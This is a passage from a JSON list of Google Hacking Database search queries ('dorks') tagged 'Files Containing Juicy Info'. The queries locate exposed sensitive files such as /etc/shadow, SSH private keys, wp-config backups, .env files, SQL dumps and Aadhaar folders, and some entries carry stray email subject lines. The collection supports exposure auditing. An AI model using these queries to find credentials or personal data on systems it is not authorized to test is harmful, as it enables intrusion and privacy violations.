administrator/components/com_admin/sql/updates/mysql/", "description": "#Google dork : inurl: administrator/components/com_admin/sql/updates/mysql/\r\n#Category: Files containing Juicy info\r\n#Date: October 08 2022\r\n#Exploit Author: Mark Ivan David"}, {"dork": "inurl: administrator/components/com_admin/sql/updates/sqlazure", "description": "#Google dork : inurl:\r\nadministrator/components/com_admin/sql/updates/sqlazure\r\n#Category: Files containing Juicy info\r\n#Date: 2/1/2023\r\n#Exploit Author: Mark Ivan David"}, {"dork": "inurl: administrator/components", "description": "#Google dork : inurl: administrator/components\r\n#Category: Files containing Juicy info\r\n#Date: 2/1/2023\r\n#Exploit Author: Mark Ivan David"}, {"dork": "inurl: wp-content/plugin/404-redirection-manager", "description": "# Google Dork: inurl: wp-content/plugin/404-redirection-manager\r\n# Files Containing Juicy Info\r\n# Date:09/02/2023\r\n# Exploit Author: Rutvik Jaini"}, {"dork": "site:investor.*.* AND inurl:home/default.aspx", "description": "# Google Dork: site:investor.*.* AND inurl:home/default.aspx\r\n# Files Containing Juicy Info\r\n# Date: 12/10/2022\r\n# Exploit Author: Salah Eddine Louffidi"}, {"dork": "intitle:\"Oracle WebLogic Server\"", "description": "# Google Dork: intitle:\"Oracle WebLogic Server\"\r\n# Files Containing Juicy Info\r\n# Date:06/02/2023\r\n# Exploit Author: Eve Cohen"}, {"dork": "intext:\"index of\" \".git\"", "description": "# Google Dork: intext:\"index of\" \".git\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" \"phpinfo\"", "description": "# Google Dork: intext:\"index of\" \"phpinfo\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" \"xmlrpc.php\"", "description": "# Google Dork: intext:\"index of\" \"xmlrpc.php\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" \"phpMyAdmin\"", "description": "# Google Dork: intext:\"index of\" \"phpMyAdmin\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:BioTime AND intext:ZKTeco Security LLC", "description": "# Google Dork: intitle:BioTime AND intext:ZKTeco Security LLC\r\n# Files Containing Juicy Info\r\n# Date:09/02/2023\r\n# Exploit Author: Robot Shell"}, {"dork": "inurl: wp-content/plugin/8-degree-notification-bar", "description": "# Google Dork: inurl: wp-content/plugin/8-degree-notification-bar\r\n# Files Containing Juicy Info\r\n# Date:09/02/2023\r\n# Exploit Author: Rutvik Jaini"}, {"dork": "intitle: index of /secrets/", "description": "# Google Dork: intitle: index of /secrets/\r\n# Files Containing Juicy Info\r\n# Date:13/02/2023\r\n# Exploit Author: Bappe Sarker"}, {"dork": "# Google Dork: intitle:\"index of\" \"admin\" \"cgi-bin\"", "description": "# Google Dork: intitle:\"index of\" \"admin\" \"cgi-bin\"\r\n# Files Containing Juicy Info\r\n# Date: 2/12/2022\r\n# Exploit Author: Umandon Ardaw"}, {"dork": "intext:\"index of\" \"backuop/*.sql\"", "description": "# Google Dork: intext:\"index of\" \"backuop/*.sql\"\r\n# Files Containing Juicy Info\r\n# Date:15/02/2023\r\n# Exploit Author: Ahmad Kataranjee"}, {"dork": "intitle:index of \"wc.db\"", "description": "# Google Dork: intitle:index of \"wc.db\"\r\n# Files Containing Juicy Info\r\n# Date:15/02/2023\r\n# Exploit Author: Pradeep A"}, {"dork": "inurl:\"/wp-content/plugins/imagemagick-engine/\"", "description": "# Google Dork: inurl:\"/wp-content/plugins/imagemagick-engine/\"\r\n# Files Containing Juicy Info\r\n# Date:21/02/2023\r\n# Exploit Author: Red Blue Ops"}, {"dork": "intitle:\"index of\" intext:\"Apache/1.4\"", "description": "# Google Dork: intitle:\"index of\" intext:\"Apache/1.4\"\r\n# Files Containing Juicy Info\r\n# Date:21/02/2023\r\n# Exploit Author: Ismail Tasdelen"}, {"dork": "DHDB - GOOGLE DORK", "description": "# Google Dork: index.of conf.php\r\n# Files Containing Juicy Info\r\n# Date:21/02/2023\r\n# Exploit Author: Ishaq Mahmud"}, {"dork": "intitle:index.of intext:log inurl:nasa", "description": "# Google Dork: intitle:index.of intext:log inurl:nasa\r\n# Files Containing Juicy Info\r\n# Date:21/02/2023\r\n# Exploit Author: Rhishinathvarma Marimuthu"}, {"dork": "Index:Index of /wp-admin", "description": "# Google Dork: Index:Index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: Kayala Satya Prakash"}, {"dork": "intitle:\"index of /\" intext:\".db", "description": "# Google Dork: intitle:\"index of /\" intext:\".db\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: isa ghojaria"}, {"dork": "intext:phpMiniAdmin inurl:phpminiadmin ext:php", "description": "# Google Dork: intext:phpMiniAdmin inurl:phpminiadmin ext:php\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: Nullfuzz"}, {"dork": "inurl:backup filetype:sql", "description": "# Google Dork: inurl:backup filetype:sql\r\n# Files Containing Juicy Info\r\n# Date:22/02/2023\r\n# Exploit Author: Nox Mentor"}, {"dork": "New Google Dork Discovery: Indexof:admin site:*.com", "description": "# Google Dork: Indexof:admin site:*.com\r\n# Files Containing Juicy Info\r\n# Date:24/02/2023\r\n# Exploit Author: Alok Bhagat"}, {"dork": "intext:\"index of\" \"config\"", "description": "# Google Dork: intext:\"index of\" \"config\"\r\n# Files Containing Juicy Info\r\n# Date:24/02/2023\r\n# Exploit Author: Muhammad Navaid Zafar Ansari"}, {"dork": "intitle:\"Index of /cam/\"", "description": "# Google Dork: intitle:\"Index of /cam/\"\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: Sanu Jose M"}, {"dork": "intitle:\"index of\" intext:user inurl:data", "description": "# Google Dork: intitle:\"index of\" intext:user inurl:data\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: Echo Programs"}, {"dork": "Dork wp-config.bak - Exploit Title: intext: \"index of\" \"wp-config.php.bak\"", "description": "# Google Dork: Dork wp-config.bak - Exploit Title: intext: \"index of\" \"wp-config.php.bak\"\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: NeoInvasor"}, {"dork": "index of:admin.asp", "description": "# Google Dork: index of:admin.asp\r\n# Files Containing Juicy Info\r\n# Date:27/02/2023\r\n# Exploit Author: index of:admin.asp"}, {"dork": "allintitle:\"ProjectDox Login\"", "description": "# Google Dork: allintitle:\"ProjectDox Login\"\r\n# Files Containing Juicy Info\r\n# Date:28/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "intitle:\"index of\" /etc/shadow", "description": "# Google Dork: intitle:\"index of\" /etc/shadow\r\n# Files Containing Juicy Info\r\n# Date:07/03/2023\r\n# Exploit Author: Husain Saleem"}, {"dork": "intitle:\"index of\" inurl:admin/login", "description": "# Google Dork: intitle:\"index of\" inurl:admin/login\r\n# Files Containing Juicy Info\r\n# Date:07/03/2023\r\n# Exploit Author: AJAY JOSEPH"}, {"dork": "intext:\"index of\" \"wp-content.zip\" - Files Containing Juicy Info", "description": "# Google Dork: intext:\"index of\" \"wp-content.zip\"\r\n# Files Containing Juicy Info\r\n# Date:09/03/2023\r\n# Exploit Author: Sharique Raza"}, {"dork": "Re: New Dork Submission for Google Hacking Database !!", "description": "# Google Dork: \"intitle:index of wp-content/plugins/wp-mail-smtp/\"\r\n# Files Containing Juicy Info\r\n# Date:09/03/2023\r\n# Exploit Author: Ishwar Kumar"}, {"dork": "intext:\"index of\" smb.conf", "description": "# Google Dork: intext:\"index of\" smb.conf\r\n# Files Containing Juicy Info\r\n# Date:13/03/2023\r\n# Exploit Author: Konat\u00e9 Olivier"}, {"dork": "inurl:robots filetype:txt", "description": "# Google Dork: inurl:robots filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:13/03/2023\r\n# Exploit Author: Konat\u00e9 Olivier"}, {"dork": "intitle:\"index of\" \"database.sql\"", "description": "# Google Dork: intitle:\"index of\" \"database.sql\"\r\n# Files Containing Juicy Info\r\n# Date:14/03/2023\r\n# Exploit Author: Prathamesh Pawar"}, {"dork": "Re: intext:\"index of\" \"wp-content.zip\" - Files Containing Juicy Info", "description": "# Google Dork: intext:\"index of\" \"wp-content.zip\"\r\n# Files Containing Juicy Info\r\n# Date:14/03/2023\r\n# Exploit Author: Sharique Raza"}, {"dork": "intitle:\"index of\" inurl:wp-json index.json", "description": "# Google Dork: intitle:\"index of\" inurl:wp-json index.json\r\n# Files Containing Juicy Info\r\n# Date:14/03/2023\r\n# Exploit Author: Rutvik Jaini"}, {"dork": "inurl:login/login", "description": "# Google Dork: inurl:login/login\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Javier Bernardo"}, {"dork": "site:.in intext:\"Index of\" intitle:\"index of\"", "description": "# Google Dork: site:.in intext:\"Index of\" intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: BASIL ELDHOSE"}, {"dork": "inurl: \"phpmyadmin/setup/\"", "description": "# Google Dork: inurl: \"phpmyadmin/setup/\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Arjun Chandarana"}, {"dork": "site:.com intitle:index of /wp-admin", "description": "# Google Dork: site:.com intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: PRINCY M JOSE"}, {"dork": "inurl:ssh intitle:index of /files", "description": "# Google Dork: inurl:ssh intitle:index of /files\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: PRINCY M JOSE"}, {"dork": "inurl:\"/api-docs\"", "description": "# Google Dork: inurl:\"/api-docs\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Arjun Chandarana"}, {"dork": "intitle:\"index of\" \"checkout\"", "description": "# Google Dork: intitle:\"index of\" \"checkout\"\r\n# Files Containing Juicy Info\r\n# Date:16/03/2023\r\n# Exploit Author: Faizan Akhtar"}, {"dork": "intitle:\"Index of\" site:.bd", "description": "# Google Dork: intitle:\"Index of\" site:.bd\r\n# Files Containing Juicy Info\r\n# Date:21/03/2023\r\n# Exploit Author: Soriful Islam"}, {"dork": "intitle:\"index of\" inurl:admin/php", "description": "# Google Dork: intitle:\"index of\" inurl:admin/php\r\n# Files Containing Juicy Info\r\n# Date:21/03/2023\r\n# Exploit Author: Md Hasib"}, {"dork": "allintitle:\"VidyoRouter Configuration\"", "description": "# Google Dork: allintitle:\"VidyoRouter Configuration\"\r\n# Files Containing Juicy Info\r\n# Date:24/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "intitle:\"index of \"conf.json\"", "description": "# Google Dork: intitle:\"index of \"conf.json\"\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Suman Das"}, {"dork": "BroadBand Device Webserver", "description": "# Google Dork: BroadBand Device Webserver\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Shx"}, {"dork": "intitle:index of django/admin site:.*", "description": "# Google Dork: intitle:index of django/admin site:.*\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Md rofikul"}, {"dork": "intitle:\"index of \"application.yml\"", "description": "# Google Dork: intitle:\"index of \"application.yml\"\r\n# Files Containing Juicy Info\r\n# Date:29/03/2023\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of \" \"shell.txt\"", "description": "# Google Dork: intitle:\"index of \" \"shell.txt\"\r\n# Files Containing Juicy Info\r\n# Date:30/03/2023\r\n# Exploit Author: Delowar Hossain"}, {"dork": "intitle:'Sypex Dumper\" inurl:sxd", "description": "# Google Dork: intitle:'Sypex Dumper\" inurl:sxd\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Cyber Cyber"}, {"dork": "intext:\"index of\" downloads\" site:*.*", "description": "# Google Dork: intext:\"index of\" downloads\" site:*.*\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Monirul Islam"}, {"dork": "GHDB-GOOGLE DORK", "description": "# Google Dork: index.of conf.bak\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Ishaq Mahmud"}, {"dork": "Dork Submission", "description": "# Google Dork: index of: admin.json\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Ahmed Morve"}, {"dork": "intitle:\"index of /\" \"docker-compose.yml\" \".env\"", "description": "# Google Dork: intitle:\"index of /\" \"docker-compose.yml\" \".env\"\r\n# Files Containing Juicy Info\r\n# Date: 06/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \"public.zip\"", "description": "# Google Dork: intitle:\"index of /\" \"public.zip\"\r\n# Files Containing Juicy Info\r\n# Date: 06/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \"admin.zip\" \"admin/\"", "description": "# Google Dork: intitle:\"index of /\" \"admin.zip\" \"admin/\"\r\n# Files Containing Juicy Info\r\n# Date: 06/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \".apk\" inurl:\".ir/\"", "description": "# Google Dork: intitle:\"index of /\" \".apk\" inurl:\".ir/\"\r\n# Files Containing Juicy Info\r\n# Date: 04/06/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "inurl:\"/scada-vis\"", "description": "# Google Dorks: inurl:\"/scada-vis\"\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Parsa Rezaie Khiabanloo"}, {"dork": "inurl:*/signIn.do", "description": "# Google Dork: inurl:*/signIn.do\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: ABHISHEK UZUMAKI"}, {"dork": "intitle:\"index of\" \"config.html\"", "description": "# Google Dork: intitle:\"index of\" \"config.html\"\r\n# Files Containing Juicy Info\r\n# Date:06/04/2023\r\n# Exploit Author: Delowar Hossain"}, {"dork": "inurl:\":8080/\" intext:\"index of /\" \"win64\" -LiteSpeed", "description": "# Google Dork: inurl:\":8080/\" intext:\"index of /\" \"win64\" -LiteSpeed\r\n# Files Containing Juicy Info\r\n# Date:10/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "inurl:\".ir/\" intext:\"index of /\" \".ovpn\"", "description": "# Google Dork: inurl:\".ir/\" intext:\"index of /\" \".ovpn\"\r\n# Files Containing Juicy Info\r\n# Date:10/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of /\" \"styleci.yml\" \".env\"", "description": "# Google Dork: intitle:\"index of /\" \"styleci.yml\" \".env\"\r\n# Files Containing Juicy Info\r\n# Date:12/04/2023\r\n# Exploit Author: Azar Abdulla"}, {"dork": "inurl:\"/private\" intext:\"index of /\" inurl:\"owncloud\" -litespeed", "description": "# Google Dork: inurl:\"/private\" intext:\"index of /\" inurl:\"owncloud\" -litespeed\r\n# Files Containing Juicy Info\r\n# Date:12/04/2023\r\n# Exploit Author: Azar Abdulla"}, {"dork": "inurl:\"/private\" intext:\"index of /\" \"win64\" -litespeed", "description": "# Google Dork: inurl:\"/private\" intext:\"index of /\" \"win64\" -litespeed\r\n# Files Containing Juicy Info\r\n# Date:12/04/2023\r\n# Exploit Author: Azar A. Nariman"}, {"dork": "intitle:\"index of\" \"properties.json\"", "description": "# Google Dork: intitle:\"index of\" \"properties.json\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Arnob Biswas"}, {"dork": "intitle:\"index of\" \"config.php\"", "description": "# Google Dork: intitle:\"index of\" \"config.php\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Jerr279"}, {"dork": "intitle:\"index of \" \"config/db\"", "description": "# Google Dork: intitle:\"index of\" \"properties.json\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Jerr279"}, {"dork": "inurl:\"/private\" intext:\"index of /\" \"config\"", "description": "# Google Dork: inurl:\"/private\" intext:\"index of /\" \"config\"\r\n# Files Containing Juicy Info\r\n# Date: 13/04/2023\r\n# Exploit Author: Jerr279"}, {"dork": "inurl:info.php intext:\"PHP Version\" intitle:\"phpinfo()\"", "description": "# Google Dork: inurl:info.php intext:\"PHP Version\" intitle:\"phpinfo()\"\r\n# Files containing juicy info.\r\n# Date: 13/04/2023\r\n# Exploit Author: Vitor Guaxi"}, {"dork": "About dorks", "description": "# Google Dork: intitle: index of /phpMyAdmin/index.php\r\n# Files Containing Juicy Info\r\n# Date:17/04/2023\r\n# Exploit Author: Rajendra Prasad Dhital"}, {"dork": "intext:\"Index of\" intext:\"backup.tar\"", "description": "# Google Dork: intext:\"Index of\" intext:\"backup.tar\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "Index of\" intext:\"source_code.zip", "description": "# Google Dork: Index of\" intext:\"source_code.zip\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"backend/\"", "description": "# Google Dork: intext:\"Index of\" intext:\"backend/\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"plugin/\"", "description": "# Google Dork: intext:\"Index of\" intext:\"plugin/\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"bitbucket-pipelines.yml\"", "description": "# Google Dork: intext:\"Index of\" intext:\"bitbucket-pipelines.yml\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "intext:\"Index of\" intext:\"/etc\"", "description": "# Google Dork: intext:\"Index of\" intext:\"/etc\"\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: PARAG BAGUL"}, {"dork": "Re: Thank you for your submission! Re: intitle:index of db.sqlite3", "description": "# Google Dork: intitle:index of db.sqlite3\r\n# Files Containing Juicy Info\r\n# Date:20/04/2023\r\n# Exploit Author: Shebu"}, {"dork": "intext:pom.xml intitle:\"index of /\"", "description": "# Google Dork: intext:pom.xml intitle:\"index of /\"\r\n# Files Containing Juicy Info\r\n# Date:21/04/2023\r\n# Exploit Author: Sagar Banwa"}, {"dork": "Re: intitle:\"index of\" \"docker-compose.yml\"", "description": "# Google Dork: intitle:\"index of\" \"docker-compose.yml\"\r\n# Files Containing Juicy Info\r\n# Date:28/04/2023\r\n# Exploit Author: Mohd S"}, {"dork": "Re: GHDB Dork", "description": "# Google Dork: intitle:index.of conf.mysql\r\n# Files Containing Juicy Info\r\n# Date:02/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "inurl: \"/wp-content/uploads\"", "description": "# Google Dork: inurl: \"/wp-content/uploads\"\r\n# Files Containing Juicy Info\r\n# Date:02/05/2023\r\n# Exploit Author: Andrew Gimenez"}, {"dork": "Google dork submission: intitle:\"index of\" \"users.yml\" | \"admin.yml\" | \"config.yml\"", "description": "# Google Dork: intitle:\"index of\" \"users.yml\" | \"admin.yml\" | \"config.yml\"\r\n# Files Containing Juicy Info\r\n# Date:02/05/2023\r\n# Exploit Author: Mohammed A.Siledar"}, {"dork": "intitle:\"index of \"phpunit.yml\"", "description": "# Google Dork: intitle:\"index of \"phpunit.yml\"\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Suman Das"}, {"dork": "intext:\"index of\" inurl:jwks-rsa", "description": "# Google Dork: intext:\"index of\" inurl:jwks-rsa\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:\"index of\" \"download.php?file=\"", "description": "# Google Dork: intitle:\"index of\" \"download.php?file=\"\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" inurl:json-rpc", "description": "# Google Dork: intext:\"index of\" inurl:json-rpc\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "inurl:\"wp-content\" intitle:\"index.of\" intext:backup\"", "description": "# Google Dork: inurl:\"wp-content\" intitle:\"index.of\" intext:backup\"\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Andrew Gimenez"}, {"dork": "inurl:\"wp-content\" intitle:\"index.of\" intext:wp-config.php", "description": "# Google Dork: inurl:\"wp-content\" intitle:\"index.of\" intext:wp-config.php\r\n# Files Containing Juicy Info\r\n# Date:05/05/2023\r\n# Exploit Author: Andrew Gimenez"}, {"dork": "inurl:\"php?sql=select\" ext:php", "description": "# Google Dork: inurl:\"php?sql=select\" ext:php\r\n# Files Containing Juicy Info\r\n# Date:08/05/2023\r\n# Exploit Author: dmr"}, {"dork": "inurl: /libraries/joomla/database/", "description": "# Google Dork: inurl: /libraries/joomla/database/\r\n# Files Containing Juicy Info\r\n# Date:08/05/2023\r\n# Exploit Author: Mark Ivan David"}, {"dork": "inurl:/wp-login.php?action=register intext:\"Register For This Site\"", "description": "# Google Dork: inurl:/wp-login.php?action=register intext:\"Register For This Site\"\r\n# Files Containing Juicy Info\r\n# Date:16/05/2023\r\n# Exploit Author: Puneet Saraswat"}, {"dork": "inurl:user intitle:\"Drupal\" intext:\"Log in\" -\"powered by\"", "description": "# Google Dork: inurl:user intitle:\"Drupal\" intext:\"Log in\" -\"powered by\"\r\n# Files Containing Juicy Info\r\n# Date:16/05/2023\r\n# Exploit Author: Puneet Saraswat"}, {"dork": "CMS Made Simple < 2.2.10 - SQL Injection", "description": "# Google Dork: CMS Made Simple < 2.2.10 - SQL Injection\r\n# Files Containing Juicy Info\r\n# Date:16/05/2023\r\n# Exploit Author: Daniele Scanu"}, {"dork": "inurl:wp-content/uploads/wcpa_uploads", "description": "# Google Dork: inurl:wp-content/uploads/wcpa_uploads\r\n# Files Containing Juicy Info\r\n# Date: 17/05/2023\r\n# Author: Stuart Steenberg"}, {"dork": "Files Containing Juicy Info", "description": "# Google Dork: intitle:\"index of \"main.yml\"\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: muhammetadibas"}, {"dork": "Vulnerable Files", "description": "# Google Dork: inurl:uploadimage.php\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: muhammetadibas"}, {"dork": "intitle:\"Sharing API Info\"", "description": "# Google Dork: intitle:\"Sharing API Info\"\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: dmr"}, {"dork": "intitle:\"index of\" github-api", "description": "# Google Dork: intitle:\"index of\" github-api\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Midhya Mathew"}, {"dork": "intitle:\"index of\" google-maps-api", "description": "# Google Dork: intitle:\"index of\" google-maps-api\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Midhya Mathew"}, {"dork": "intitle:\"Index of\" inurl:/backup/ \"admin.zip\"", "description": "# Google Dork: intitle:\"Index of\" inurl:/backup/ \"admin.zip\"\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Midhya Mathew"}, {"dork": "inurl:*/wp-content/plugins/contact-form-7/", "description": "# Google Dork: inurl:*/wp-content/plugins/contact-form-7/\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Bappe Sarker"}, {"dork": "Re: \"index of /backup.sql", "description": "# Google Dork: index of /backup.sql\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "Re: intitle:index.of conf.php", "description": "# Google Dork: intitle:index.of conf.php\r\n# Files Containing Juicy Info\r\n# Date:26/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "intitle:\"index of\" \"profiler\"", "description": "# Google Dork: intitle:\"index of\" \"profiler\"\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:\"index of\" \"private.properties\"", "description": "# Google Dork: intitle:\"index of\" \"private.properties\"\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "allintitle:\"macOS Server\" site:.edu", "description": "# Google Dork: allintitle:\"macOS Server\" site:.edu\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Thomas Heverin"}, {"dork": "inurl:wp-content/uploads/sites", "description": "# Google Dork: inurl:wp-content/uploads/sites\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intitle:\"SCM Manager\" intext:1.60", "description": "# Google Dork: intitle:\"SCM Manager\" intext:1.60\r\n# Files Containing Juicy Info\r\n# Date:31/05/2023\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "RE: inurl:/wp-content/uploads/wpo_wcpdf", "description": "# Google Dork: inurl:/wp-content/uploads/wpo_wcpdf\r\n# Files Containing Juicy Info\r\n# Date:02/06/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intext:\"ArcGIS REST Services Directory\" intitle:\"Folder: /\"", "description": "# Google Dork: intext:\"ArcGIS REST Services Directory\" intitle:\"Folder: /\"\r\n# Files Containing Juicy Info\r\n# Date:02/06/2023\r\n# Exploit Author: Alonso Eduardo Caballero Quezada"}, {"dork": "Google dorks", "description": "# Google Dork: intext:\"/login.php\" intitle:\"login\"\r\n# Files Containing Juicy Info\r\n# Date: 04/06/2023\r\n# Exploit Author: Avadhesh Nishad\r\n\r\n\r\n\r\n\r\n\r\nAvadhesh Nishad\r\n\r\n( WEB APPLICATION SECURITY RESEARCHERS )\r\n\r\n\r\n*POC Images Attached with this mail.*\r\n\r\n\r\n[image: Screenshot (4).png]\r\n[image: Screenshot (5).png]"}, {"dork": "intitle:\"index of\" \"pass.txt\"", "description": "# Google Dork: intitle:\"index of\" \"pass.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 17/07/2023\r\n# Exploit Author: Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"config.txt\"", "description": "# Google Dork: intitle:\"index of\" \"config.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 17/07/2023\r\n# Exploit Author: Aashiq Ahamed"}, {"dork": "allintext:static/uploads", "description": "# Google Dork: allintext:static/uploads\r\n# Files Containing Juicy Info\r\n# Date: 07/09/2023\r\n# Exploit Author: Affan Ali"}, {"dork": "inurl: /default.rdp", "description": "# Google Dork: inurl: /default.rdp\r\n# Files Containing Juicy Info\r\n# Date: 07/09/2023\r\n# Exploit Author: Arjun Vijaypal Singh"}, {"dork": "My name is Jannatul Adnin and I would like to report a new Google dork.", "description": "# Google Dork: inurl:\"/admin\" intitle:\"portfolio\".\r\n# Files Containing Juicy Info\r\n# Date: 08/09/2023\r\n# Exploit Jannatul Adnin"}, {"dork": "new google dork", "description": "# Google Dork: index of cpanel.txt\r\n# Files Containing Juicy Info\r\n# Date: 08/09/2023\r\n# Author: Ved Kolambkar"}, {"dork": "intitle:\"Index of /api/\"", "description": "# Google Dork: intitle:\"Index of /api/\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Kamran Saifullah"}, {"dork": "intitle:\"Index of /bank/\"", "description": "Google Dork: intitle:\"Index of /bank/\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Kamran Saifullah"}, {"dork": "inurl:php?id=1 site:com", "description": "Google Dork: inurl:php?id=1 site:com\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Akshad Joshi"}, {"dork": "inurl:\"cf/assets\" \"MultiFileUpload.swf\"", "description": "Google Dork: inurl:\"cf/assets\" \"MultiFileUpload.swf\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Author: Datain Alexandre"}, {"dork": "intitle:\"index of /wp-content/plugins\"", "description": "Google Dork: intitle:\"index of /wp-content/plugins\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Ritesh Sahu"}, {"dork": "intitle:\"index of\" \".ssh\" OR \"ssh_config\" OR \"ssh_known_hosts\" OR \"authorized_keys\" OR \"id_rsa\" OR \"id_dsa\"", "description": "Google Dork: intitle:\"index of\" \".ssh\" OR \"ssh_config\" OR \"ssh_known_hosts\" OR \"authorized_keys\" OR \"id_rsa\" OR \"id_dsa\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Ritesh Sahu"}, {"dork": "inurl:wp-includes", "description": "# Google Dork: inurl:\"wp-includes\"\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Author: Jose Rivas Aka. Bl4cksku11"}, {"dork": "For Google dork", "description": "# Google Dork: allintitle:\"macOS Server\" site:.com\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Kamlesh Pendurkar"}, {"dork": "index of: /aadhar", "description": "# Google Dork: index of: /aadhar\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit sai vijay kumar M"}, {"dork": "google dork give nginx.conf file", "description": "# Google Dork: intitle:\"index of\" \"nginx.conf\"\r\n# Files Containing 